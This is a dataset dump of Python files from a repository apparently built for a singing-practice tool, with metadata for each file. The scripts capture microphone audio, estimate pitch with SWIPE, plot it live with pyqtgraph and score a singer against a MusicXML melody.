self.setLayout(self.mainLayout)\n\n self.swipes = []\n self.times = []\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(updateInterval) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.update)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\")\n # self.plotSwipe.setLogMode(x=False,y=True)\n\n min_freq = np.log(80)/np.log(2**(1/12))\n max_freq = np.log(800)/np.log(2**(1/12))\n\n self.plotSwipe.setYRange(min_freq, max_freq, padding=0)\n\n self.plot_swipe_item = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n\n r2 = pg.QtGui.QGraphicsRectItem(5, 1, 6, 3.2)\n r2.setPen(pg.mkPen((0, 0, 0, 100)))\n r2.setBrush(pg.mkBrush((50, 50, 200)))\n self.plotSwipe.showGrid(True,True)\n\n\n\n ay = self.plotSwipe.getAxis('left')\n dy = [(value+0.5, str(value+0.5)) for value in range(int(min_freq),int(max_freq))]\n ay.setTicks([dy, []])\n self.ax = self.plotSwipe.getAxis('bottom')\n\n self.plotSwipe.addItem(r2)\n self.ticks = np.arange(self.t-self.timeWindow/2,\n self.t+self.timeWindow/2,0.75)\n\n\n def update(self):\n self.plotSwipe.setXRange(self.t-self.timeWindow/2,\n self.t+self.timeWindow/2, padding=0)\n\n if self.t+self.timeWindow/2 > max(self.ticks):\n self.ticks = np.roll(self.ticks,-1)\n np.put(self.ticks,-1,max(self.ticks)+0.75)\n dx = [(val, str(int(val/0.75))) for val in self.ticks]\n self.ax.setTicks([dx,[]])\n\n newSwipes, newTimes = self.sweeper.getSwipes()\n self.swipes += newSwipes\n self.times += newTimes\n\n\n if len(self.swipes) > 0:\n self.plot_swipe_item.setData(self.times,self.swipes)\n # try:\n # data, tp = self.sweeper.getPitches().get_nowait()\n # except queue.Empty:\n # print('no swipes')\n # else:\n # self.pitch = np.roll(self.pitch,-len(data))\n # np.put(self.pitch,range(-len(data),-1),data)\n # t0 = time.perf_counter()\n # self.plot_swipe_item.setData(self.tp,np.log10(self.pitch))\n # print('plot time: ', time.perf_counter()-t0)\n self.t = time.time()-self.t0\n\n\ndef main():\n app = QtWidgets.QApplication([])\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n sweeper = RTSwipe()\n rollWindow = RollWindow(sweeper,updateInterval=40)\n app.aboutToQuit.connect(sweeper.exitHandler)\n rollWindow.show()\n rollWindow.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6794871687889099, "alphanum_fraction": 0.7019230723381042, "avg_line_length": 21.35714340209961, "blob_id": "6052437f0427729ed45480f9abe06f1be11e38e9", "content_id": "d143a68a01b144bc0637e440777fa86c70cd74de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 71, "num_lines": 14, "path": "/erik/testingtesting.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from music21 import *\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\n\n#print(piece.flat.tempo)\n\n#for e in piece.flat.elements:\n #print(e)\n\n#print(piece.flat.getElementsByClass(meter.TimeSignature)[0].numerator)\n\nfor i in range(40, 60, True):\n p = pitch.Pitch()\n p.midi = i\n print(p.nameWithOctave)" }, { "alpha_fraction": 0.574280321598053, "alphanum_fraction": 0.5898298025131226, "avg_line_length": 30.516555786132812, "blob_id": "9f1936c2c61b3b43605d7bb625e5c5058c0df99c", "content_id": "ca954280294d0db3ff0a59d6d4ebb0b3b8a0c495", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4759, "license_type": 
"no_license", "max_line_length": 131, "num_lines": 151, "path": "/python/testpy/scat_w_callback.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\n\n# win = None\n# app = None\n\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n\n loop = 0.2\n # pyaudio stuff\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = int(loop*self.RATE)\n\n p = pyaudio.PyAudio()\n self.stream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=True,\n #stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n\n nbr_pitch = 10\n nbr_sec = 10\n self.t = np.linspace(-nbr_sec,0,num=nbr_sec*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(loop/nbr_sec*self.RATE)\n self.pitch = np.zeros(int(nbr_pitch/self.dt*self.RATE))\n self.tp = np.linspace(-nbr_sec,0,num=len(self.pitch))\n\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(loop*1000) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.onNewData)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\", row=1, col=0)\n self.plotSound = self.addPlot(title=\"Sound\", row=0, col=0)\n\n # print(self.plotSwipe.getViewBox())\n\n self.plotDataItem = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.plotSoundData = self.plotSound.plot()\n\n self.t0 = time.process_time()\n self.tcallb = time.process_time()\n\n def audio_callback(self, in_data, frame_count, time_info, status):\n\n # print('callb period: ', time.process_time() - self.tcallb) #this print fucks things up sometimes..\n self.tcallb = time.process_time()\n audio_data = np.frombuffer(in_data, dtype=np.int16)\n audio_data = audio_data.astype('float16')\n # print(audio_data)\n self.sound = np.roll(self.sound,-len(audio_data))\n np.put(self.sound,range(-len(audio_data),-1),audio_data)\n\n # print('in_data: ',len(in_data))\n # print('audio_data: ', len(audio_data))\n return(in_data,pyaudio.paContinue)\n\n #np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK))\n\n def onNewData(self):\n tp = time.process_time()-self.t0\n self.t0 = time.process_time()\n print('tp: ', tp)\n # try:\n # data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK)))#,exception_on_overflow = False)))\n #\n # except:\n # data = np.take(self.sound,range(-self.CHUNK,-1))\n # #data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n # print('overflow')\n # data = data.astype('float64')\n # print(len(data))\n # self.sound = np.roll(self.sound,-len(data))\n #\n data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n data = data.astype('float64')\n self.sound = np.roll(self.sound,-len(data))\n np.put(self.sound,range(-len(data),-1),data)\n # data = self.sound[range(-int(tp*self.RATE),-1)]\n\n # print(-int(tp/self.RATE))\n # print(len(data))\n # print(len(self.sound))\n # print('len data: ', len(data))\n\n t1 = time.process_time()\n sw = swipe(data,self.RATE,self.dt,min=40,max=1000,threshold=0.25)\n # print('swipe time: ', time.process_time()-t1)\n # print(time.process_time()-t1)\n\n 
self.pitch = np.roll(self.pitch,-len(sw))\n\n np.put(self.pitch,range(-len(sw),-1),sw)\n\n t3 = time.process_time()\n self.plotDataItem.setData(self.tp, self.pitch)\n t4 = time.process_time()\n # print('plot pitch: ', t4-t3)\n self.plotSoundData.setData(self.t, self.sound)\n # print('plot sound: ',time.process_time()-t4)\n\n\ndef main():\n # global win, app\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n win = MyWidget()\n app.aboutToQuit.connect(myExitHandler)\n win.show()\n # win.resize(800,600)\n win.raise_()\n app.exec_()\n\ndef myExitHandler():\n # global win, app\n time.sleep(0.2)\n # app = None\n # print(win.plotSwipe.getViewBox())\n # win.plotSwipe.clear()\n # win.plotSound.clear()\n # print('cleared')\n\n # del win\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5663390755653381, "alphanum_fraction": 0.5933660864830017, "avg_line_length": 19.871795654296875, "blob_id": "db0d9f07cbb99ee8cdf13b92b3ce83260ca28a83", "content_id": "280e1b68252c234c5725543cec5a0edfaa2896ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1628, "license_type": "no_license", "max_line_length": 62, "num_lines": 78, "path": "/python/testpy/test.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "#! /usr/local/bin/python\n\nimport pyaudio\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nimport crepe\n\n\nCHUNK = 4000\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 16000\n\nx = range(1, 100)\nplt.plot(x)\nplt.show()\n\np = pyaudio.PyAudio()\n\nchosen_device_index = -1\nfor x in range(0, p.get_device_count()):\n info = p.get_device_info_by_index(x)\n # print p.get_device_info_by_index(x)\n if info[\"name\"] == \"pulse\":\n chosen_device_index = info[\"index\"]\n print(\"Chosen index: \", chosen_device_index)\n\n\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input_device_index=chosen_device_index,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n )\n\nplt.ion()\nfig, ax = plt.subplots()\n\nx = np.arange(0, CHUNK)\ndata = stream.read(CHUNK)\ndata_int16 = struct.unpack(str(CHUNK) + 'h', data)\nline, = ax.plot(x, data_int16)\n# ax.set_xlim([xmin,xmax])\nax.set_ylim([-2**15, (2**15) - 1])\n\n# fig = plt.gcf()\n# fig.show()\n# fig.canvas.draw()\n\ndata = struct.unpack(str(CHUNK) + 'h', stream.read(CHUNK))\nplt.plot()\n\nwhile True:\n # for i in range(500)\n data = struct.unpack(str(CHUNK) + 'h', stream.read(CHUNK))\n # line.set_ydata(data)\n # fig.canvas.draw()\n # fig.show()\n # fig.canvas.flush_events()\n\n print(data)\n x = range(len(data))\n\n plt.plot(x, data) # plot something\n plt.show()\n\n # update canvas immediately\n # plt.xlim([0, 100])\n # plt.ylim([0, 100])\n # plt.pause(0.01) # I ain't needed!!!\n # fig.canvas.draw()\n\nplt.plot(data)\n" }, { "alpha_fraction": 0.6130081415176392, "alphanum_fraction": 0.6520324945449829, "avg_line_length": 20.964284896850586, "blob_id": "99f64e81961812bbb51d680c5f7ecbba21f8e465", "content_id": "1851ae0bc1b9f05676baf52b8632b140df8f8f09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 615, "license_type": "no_license", "max_line_length": 54, "num_lines": 28, "path": "/python/testpy/testpygtgr.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import pyqtgraph as pg\nimport numpy as np\nimport time\n\nplt = pg.plot()\nbufferSize = 1000\ndata = 
np.zeros(bufferSize)\ncurve = plt.plot()\nline = plt.addLine(x=0)\nplt.setRange(xRange=[0, bufferSize], yRange=[-50, 50])\ni = 0\ndef update():\n global data, curve, line, i\n n = 10 # update 10 samples per iteration\n rand = np.random.normal(size=n)\n data[i:i+n] = np.clip(data[i-1] + rand, -50, 50)\n curve.setData(data)\n i = (i+n) % bufferSize\n line.setValue(i)\n\ntimer = pg.QtCore.QTimer()\ntimer.timeout.connect(update)\ntimer.start(20)\n\nwhile True:\n update()\n time.sleep(0.5)\n print('running')\n" }, { "alpha_fraction": 0.529344916343689, "alphanum_fraction": 0.5476905703544617, "avg_line_length": 33.40782165527344, "blob_id": "220dc0ec1b1aca033fc96b2d37ebe1a72db3161f", "content_id": "7e56affd4c2db3d096af735fc46654a5eafe2787", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12322, "license_type": "no_license", "max_line_length": 126, "num_lines": 358, "path": "/python/testpy/test7.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "\nimport sys\nimport time\nimport multiprocessing as mp\nimport queue\nfrom music21 import *\n\nimport math\nimport numpy as np\n\n# import music21\nimport pyaudio\nfrom pysptk.sptk import swipe\n\nfrom PyQt5 import QtCore, QtWidgets, QtGui\nimport pyqtgraph as pg\n\nglobal BASE\nBASE = np.log(2**(1 / 12))\n\n\nclass RTSwipe:\n def __init__(self, RATE=48000, CHUNK=6000, minfreq=50,\n maxfreq=1500, threshold=0.25):\n self.minfreq = minfreq\n self.maxfreq = maxfreq\n self.threshold = threshold\n\n # CHANNELS = 1\n self.RATE = RATE\n self.CHUNK = CHUNK # 2*2048\n self.swipesPerChunk = math.floor(\n CHUNK / (RATE * 0.02)) # 20 ms per swipe estimate\n # FORMAT = pyaudio.paInt16\n self.cnt = 0\n\n # self.t0 = time.time()\n # self.t = self.t0\n\n self.sound = mp.Queue()\n self.times = mp.Queue()\n self.swipes = mp.Queue()\n self.shutDown = mp.Queue()\n\n self.running = False\n\n def start_swipe(self, t):\n self.audio = pyaudio.PyAudio()\n CHANNELS = 1\n FORMAT = pyaudio.paInt16\n self.t0 = t\n self.t = self.t0\n self.stream = self.audio.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=False,\n stream_callback=self.audioCallback,\n frames_per_buffer=self.CHUNK\n )\n self.process = mp.Process(target=self.swipeSound)\n self.process.start()\n self.running = True\n\n print(\"Process started\")\n\n def set_time(self, t):\n self.t0 = t\n self.t = self.t0\n\n def audioCallback(self, in_data, frame_count, time_info, status):\n sound = np.frombuffer(in_data, dtype=np.int16)\n times = np.linspace(self.t - self.t0, time.time() - self.t0,\n self.swipesPerChunk, True)\n self.t = time.time()\n self.sound.put(sound)\n self.times.put(times)\n return(in_data, pyaudio.paContinue)\n\n def swipeSound(self):\n while True:\n if not self.shutDown.empty():\n break\n try:\n data = self.sound.get_nowait()\n except queue.Empty:\n\n time.sleep(0.04)\n else:\n data = data.astype('float64')\n sw = swipe(data, self.RATE,\n int(self.CHUNK / self.swipesPerChunk),\n min=self.minfreq, max=self.maxfreq,\n threshold=self.threshold)\n self.swipes.put(sw)\n return True\n\n def getSwipes(self):\n if not self.swipes.empty():\n swipes = self.swipes.get_nowait()\n times = self.times.get_nowait()\n newSwipes = []\n newTimes = []\n for i in range(0, len(swipes)):\n if swipes[i] > 0:\n newSwipes.append(\n np.log(swipes[i] / 8.17578) / BASE + 1 / 2)\n newTimes.append(times[i])\n return newSwipes, newTimes\n return [], []\n\n def exitHandler(self):\n print('in exit')\n 
self.audio.close(self.stream)\n self.shutDown.put(True)\n self.process.join()\n\n\nclass NotesWizard:\n def __init__(self, filePath):\n self.piece = converter.parse(filePath)\n\n self.timeSig = (self.piece.flat.\n getElementsByClass(meter.TimeSignature)[0].numerator)\n self.tempo = (self.piece.flat.\n getElementsByClass(tempo.MetronomeMark)[0].number)\n\n midimax = 0\n midimin = 9999\n t = 0\n for e in self.piece.flat.notesAndRests:\n setattr(e, \"time\", t)\n setattr(e, \"globBeat\", e.measureNumber + e.beat - 2)\n if e.isNote:\n midimax = max(midimax, e.pitch.midi)\n midimin = min(midimin, e.pitch.midi)\n rect = pg.QtGui.QGraphicsRectItem(t, e.pitch.midi - 1 / 2,\n e.seconds, 2**(1 / 12))\n rect.setPen(pg.mkPen((0, 0, 0, 100)))\n rect.setBrush(pg.mkBrush((127, 127, 127)))\n setattr(e, \"rect\", rect)\n setattr(e, 'nbr_hits', 0)\n setattr(e, 'nbr_tries', 0)\n setattr(e, 'ratio', 0.5)\n\n t += e.seconds\n\n def getNotesAndRests(self):\n return self.piece.flat.notesAndRests\n\n def getTimeSig(self):\n return self.timeSig\n\n def getTempo(self):\n return self.tempo\n\n\nclass RollWindow(pg.GraphicsWindow):\n def __init__(self, sweeper, notesWizard, parent=None, updateInterval=20,\n timeWindow=10):\n super().__init__(parent=parent)\n self.notesWizard = notesWizard\n self.sweeper = sweeper\n self.updateInterval = updateInterval\n self.timeWindow = timeWindow\n self.t = 0\n\n lay = self.ci.layout\n lay.setRowStretchFactor(0, 1)\n lay.setRowStretchFactor(1, 10)\n\n btn_layout = QtWidgets.QHBoxLayout()\n start_button = QtGui.QPushButton(\"Start\")\n re_button = QtGui.QPushButton(\"Restart\")\n quit_button = QtGui.QPushButton(\"Quit\")\n start_button.clicked.connect(self.start_pressed)\n re_button.clicked.connect(self.restart_pressed)\n quit_button.clicked.connect(self.quit_pressed)\n\n self.score_brd = QtWidgets.QLabel()\n self.score_brd.setAlignment(QtCore.Qt.AlignCenter)\n font = QtGui.QFont()\n font.setBold(True)\n font.setPointSize(25)\n self.score_brd.setFont(font)\n self.score_brd.setText('Score: 0.00')\n\n btn_layout.addWidget(start_button)\n # btn_layout.addWidget(re_button)\n # btn_layout.addWidget(quit_button)\n btn_layout.addWidget(self.score_brd)\n\n self.swipes = []\n self.times = []\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(updateInterval) # in milliseconds\n # self.timer.start()\n self.timer.timeout.connect(self.update)\n\n timeSig = notesWizard.getTimeSig()\n tempo = notesWizard.getTempo()\n\n # self.plotSwipe = self.addPlot(row=1,col=0,title=\"Swipe pitch estimates\")\n self.plotSwipe = pg.PlotWidget(title=\"Swipe pitch estimates\")\n self.plotSwipe.setYRange(36, 83, padding=0)\n self.plotSwipe.setXRange(-timeWindow / 2, timeWindow / 2, padding=0)\n\n self.xAxisSwipe = self.plotSwipe.getAxis(\"bottom\")\n self.xAxisSwipe.setTickSpacing(\n major=60 / tempo * timeSig, minor=60 / tempo)\n self.yAxisSwipe = self.plotSwipe.getAxis(\"left\")\n self.rightAxisSwipe = self.plotSwipe.getAxis(\"right\")\n self.rightAxisSwipe.setTickSpacing(levels=[(12, -0.5), (1, -0.5)])\n\n majorTicks = []\n minorTicks = []\n for i in range(0, 127):\n p = pitch.Pitch()\n p.midi = i\n if i % 12 == 0:\n majorTicks.append((i - 1 / 2, p.nameWithOctave))\n minorTicks.append((i - 1 / 2, p.nameWithOctave))\n self.yAxisSwipe.setTicks([majorTicks, minorTicks])\n self.plotSwipe.showGrid(x=True, y=True, alpha=0.5)\n self.yAxisSwipe.setTickSpacing(levels=[(12, -0.5), (1, -0.5)])\n\n # Notes\n for e in notesWizard.getNotesAndRests():\n if e.isNote:\n self.plotSwipe.addItem(e.rect)\n # Swipe 
estimates\n self.plot_swipe_item = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255, 255, 255),\n symbolSize=5,\n symbolPen=None)\n # Now line\n self.nowLine = pg.InfiniteLine(0, 90)\n self.plotSwipe.addItem(self.nowLine)\n\n # self.notes_iter = self.notesWizard.getNotesAndRests()\n self.notes_iter = self.notesWizard.piece.flat.notes\n self.current_note = next(self.notes_iter)\n self.notes_done = False\n self.score = 0\n self.total_swipes = 0\n vbox = QtWidgets.QVBoxLayout()\n vbox.addItem(btn_layout)\n vbox.addWidget(self.plotSwipe)\n self.setLayout(vbox)\n\n def quit_pressed(self):\n return True\n\n def restart_pressed(self):\n return True\n\n def start_pressed(self):\n self.cd = 4\n self.cd_timer = QtCore.QTimer(self)\n self.cd_timer.setInterval(\n 60 / self.notesWizard.tempo * 1000) # in milliseconds\n self.cd_timer.timeout.connect(self.count_down)\n self.t0 = time.perf_counter()\n self.cd_timer.start()\n\n def start_app(self):\n self.score_brd.setText(\"Score: 0.00\")\n self.t0 = time.time()\n if not self.timer.isActive():\n print('start')\n self.sweeper.start_swipe(self.t0)\n self.timer.start()\n else:\n self.sweeper.set_time(self.t0)\n\n def count_down(self):\n # print(time.perf_counter() - self.t0)\n self.t0 = time.perf_counter()\n self.cd += -1\n self.score_brd.setText(str(self.cd))\n if self.cd == 0:\n self.cd_timer.stop()\n self.start_app()\n\n def update_score(self):\n if self.current_note.isNote:\n prev_hits = self.score * self.total_swipes\n self.total_swipes += (self.current_note.seconds *\n self.sweeper.swipesPerChunk *\n self.sweeper.RATE / self.sweeper.CHUNK)\n self.score = ((prev_hits + self.current_note.nbr_hits)\n / self.total_swipes)\n score_str = 'Score: ' + str(round(self.score, 2))\n self.score_brd.setStyleSheet('QLabel { color:rgb(' +\n str(int(255 * (1 - self.score))) + ',' +\n str(int(255 * self.score)) + ',0);}')\n self.score_brd.setText(score_str)\n\n # swipes = (self.current_note.seconds*self.sweeper.swipesPerChunk*\n # self.sweeper.RATE/self.sweeper.CHUNK)\n # self.score += self.current_note.nbr_hits/swipes\n # print(self.score)\n\n def set_current(self, time):\n\n if (time >= (self.current_note.time + self.current_note.seconds) and\n not self.notes_done):\n self.update_score()\n try:\n self.current_note = next(self.notes_iter)\n except StopIteration:\n self.notes_done = True\n\n def assess_pitch(self, pitches, times):\n for (p, t) in zip(pitches, times):\n self.set_current(t)\n if self.current_note.isNote:\n self.current_note.nbr_tries += 1\n if (p >= self.current_note.pitch.midi - 0.5 and\n p <= self.current_note.pitch.midi + 0.5): # ändra till +- 1/2 när någon som kan ta toner ska testa...\n self.current_note.nbr_hits += 1\n ratio = (self.current_note.nbr_hits /\n self.current_note.nbr_tries)\n self.current_note.rect.setBrush(pg.mkBrush((255 * (1 - ratio),\n 255 * ratio, 0)))\n\n def update(self):\n newSwipes, newTimes = self.sweeper.getSwipes()\n if len(newSwipes) > 0 and not self.notes_done:\n # self.notesWizard.assess_pitch(newSwipes, newTimes)\n self.assess_pitch(newSwipes, newTimes)\n self.swipes += newSwipes\n self.times += newTimes\n if len(self.swipes) > 0:\n self.plot_swipe_item.setData(self.times, self.swipes)\n dt = (time.time() - self.t0 - self.t)\n xRange = self.xAxisSwipe.range\n self.plotSwipe.setXRange(xRange[0] + dt, xRange[1] + dt, padding=0)\n self.t = time.time() - self.t0\n self.nowLine.setValue(self.t)\n\n\ndef main():\n app = QtWidgets.QApplication([])\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n 
sweeper = RTSwipe()\n wizard = NotesWizard(\"Vem_kan_segla.musicxml\")\n rollWindow = RollWindow(sweeper, wizard, updateInterval=70)\n app.aboutToQuit.connect(sweeper.exitHandler)\n rollWindow.show()\n rollWindow.raise_()\n app.exec_()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5743451714515686, "alphanum_fraction": 0.5936055183410645, "avg_line_length": 33.157894134521484, "blob_id": "ac5049afd22b78544e12a3ccf874137852ed91d1", "content_id": "0080fa825daa96f9af3aed7497aa95ad8efb32ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5192, "license_type": "no_license", "max_line_length": 123, "num_lines": 152, "path": "/python/testpy/callb_test.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\n\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n\n self.loop = 0.2 # time between updates of plot in sec, not faster than 0.15-0.2\n self.nbr_pitch = 10 # number of pitches to look for in each loop\n nbr_sec = 10 # number of seconds to display\n self.busy = False\n self.temp = np.empty(0,dtype=np.int16)\n self.t0 = time.perf_counter()\n self.cnt = 1\n\n\n\n self.setup_plot(self.loop)\n self.setup_pyaudio(self.loop)\n self.setup_datavar(self.nbr_pitch, nbr_sec, self.loop)\n\n def setup_pyaudio(self,loop):\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = 2048#int(loop*self.RATE/4)\n\n p = pyaudio.PyAudio()\n self.stream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=True,\n stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n\n def setup_datavar(self,nbr_pitch,nbr_sec,loop):\n self.t = np.linspace(-nbr_sec,0,num=nbr_sec*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(loop/nbr_pitch*self.RATE)\n self.pitch = np.zeros(int(nbr_sec/self.dt*self.RATE))\n self.tp = np.linspace(-nbr_sec,0,num=len(self.pitch))\n\n def setup_plot(self,loop):\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n # self.timer = QtCore.QTimer(self)\n # self.timer.setInterval(loop*1000) # in milliseconds\n # self.timer.start()\n # self.timer.timeout.connect(self.onNewData)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\", row=1, col=0)\n self.plotSound = self.addPlot(title=\"Sound\", row=0, col=0)\n # self.plotSwipe.setLogMode(False,True)\n # self.plotSwipe.enableAutoScale()\n\n self.plotDataItem = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.plotSoundData = self.plotSound.plot()\n\n def audio_callback(self, in_data, frame_count, time_info, status):\n audio_data = np.frombuffer(in_data, dtype=np.int16)\n # audio_data = audio_data.astype('float16')\n if self.busy:\n self.temp = np.append(self.temp,audio_data)\n else:\n if len(self.temp) > 0:\n audio_data = np.append(self.temp,audio_data)\n self.temp = np.empty(0,dtype=np.int16)\n\n self.sound = np.roll(self.sound,-len(audio_data))\n np.put(self.sound,range(-len(audio_data),-1),audio_data)\n\n tloop = time.perf_counter()-self.t0\n print('time: ', tloop)\n if tloop > self.loop:\n self.t0 = time.perf_counter()\n self.calc_pitch()\n self.plotDataItem.setData(self.tp, self.pitch)\n self.cnt = 0\n else:\n self.cnt = self.cnt+1\n\n # audio_data = 
audio_data.astype('float64')\n # sw = swipe(audio_data,self.RATE,self.dt,min=40,max=700,threshold=0.15)\n # self.pitch = np.roll(self.pitch,-len(sw))\n # np.put(self.pitch,range(-len(sw),-1),sw)\n #\n # self.plotDataItem.setData(self.tp, self.pitch)\n # self.plotSoundData.setData(self.t, self.sound)\n self.plotSoundData.setData(self.t, self.sound)\n return(in_data,pyaudio.paContinue)\n\n def calc_pitch(self):\n print('calc')\n self.busy = True\n dl = self.cnt*self.CHUNK\n dt = int(dl/self.nbr_pitch)\n data = self.sound[range(-dl,-1)]\n data = data.astype('float64')\n print(dl)\n sw = swipe(data,self.RATE,dt,min=40,max=700,threshold=0.15)\n self.pitch = np.roll(self.pitch,-len(sw))\n\n # self.plotSoundData.setData(self.t, self.sound)\n self.busy = False\n\n def onNewData(self):\n\n tp = time.clock()-self.t0\n dt = int(tp/self.nbr_pitch*self.RATE)\n print('tp: ', tp)\n self.t0 = time.clock()\n # data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n # data = np.frombuffer(self.stream.read(self.CHUNK,exception_on_overflow=False), dtype=np.int16)\n # data = data.astype('float64')\n # self.sound = np.roll(self.sound,-len(data))\n data = self.sound[range(-int(tp*self.RATE),-1)]\n # np.put(self.sound,range(-len(data),-1),data)\n # sw = swipe(data,self.RATE,dt,min=40,max=700,threshold=0.15)\n # self.pitch = np.roll(self.pitch,-len(sw))\n # np.put(self.pitch,range(-len(sw),-1),sw)\n\n # self.plotDataItem.setData(self.tp, self.pitch)\n # self.plotSoundData.setData(self.t, self.sound)\n\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n win = MyWidget()\n win.show()\n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5309752821922302, "alphanum_fraction": 0.5528521537780762, "avg_line_length": 30.15286636352539, "blob_id": "b6489352a8146be38fafd69bc30c019ff54b5403", "content_id": "0ca295d4402e99c91d12fbd40cb2ffd95c386465", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4891, "license_type": "no_license", "max_line_length": 95, "num_lines": 157, "path": "/python/pitchmp.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nimport multiprocessing as mp\nimport queue\n\nfrom pysptk.sptk import swipe\n\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = 6000#2*2048\n FORMAT = pyaudio.paInt16\n self.cnt = 0\n tsave = 10\n\n self.unprocessed_sound = mp.Queue()\n self.swipes_toplot = mp.Queue()\n self.shut_down_queue = mp.Queue()\n self.pitch = np.zeros(int(tsave*5*self.RATE/self.CHUNK))\n self.tp = np.linspace(-tsave,0,num=len(self.pitch))\n self.setup_plot()\n\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=False,\n stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n self.proc = mp.Process(target=self.do_job)\n self.proc.start()\n\n def do_job(self):\n #print('in do_job')\n while True:\n try:\n self.shut_down_queue.get_nowait()\n except:\n try:\n\n data = self.unprocessed_sound.get_nowait()\n except queue.Empty:\n #print('queue empty')\n time.sleep(0.04)\n else:\n 
